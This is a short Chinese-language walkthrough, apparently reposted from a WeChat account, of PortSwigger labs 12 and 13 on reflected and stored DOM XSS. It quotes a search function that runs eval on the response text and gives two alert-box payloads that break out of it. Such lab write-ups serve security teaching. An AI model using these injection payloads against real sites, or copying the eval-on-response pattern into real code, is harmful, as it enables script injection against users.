(Lab 12)DOM反射xss(search函数中的eval执行json中的js)
(Lab 13)DOM存储xss(search函数中的eval执行json中的js)
靶场地址:https://portswigger.net/web-security
实验12:反射DOM xss
1.靶场解析
(js代码解析如下:
function search(path) {
var xhr = new XMLHttpRequest();
xhr.onreadystatechange = function() {
if (this.readyState == 4 && this.status == 200) {
eval('var searchResultsObj = ' + this.responseText);
displaySearchResults(searchResultsObj);
}
};
这段代码是一个JavaScript函数,名为`search`。它使用XMLHttpRequest对象来异步请求数据,然后在接收到响应后执行特定的操作。
)
输入payload 12313123时:
=>
输入payload "-alert(1)}//时弹窗:
实验13:存储DOM xss
1.靶场解析
(js代码解析如下:
function search(path) {
var xhr = new XMLHttpRequest();
xhr.onreadystatechange = function() {
if (this.readyState == 4 && this.status == 200) {
eval('var searchResultsObj = ' + this.responseText);
displaySearchResults(searchResultsObj);
}
};
这段代码是一个JavaScript函数,名为`search`。它使用XMLHttpRequest对象来异步请求数据,然后在接收到响应后执行特定的操作。
)
输入payload 11111时:
=>
输入payload <><img src=1 onerror=alert(1)>时弹窗:
原文始发于微信公众号(鲲哥的Bypass之旅):portswigger靶场-Lab12、13
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论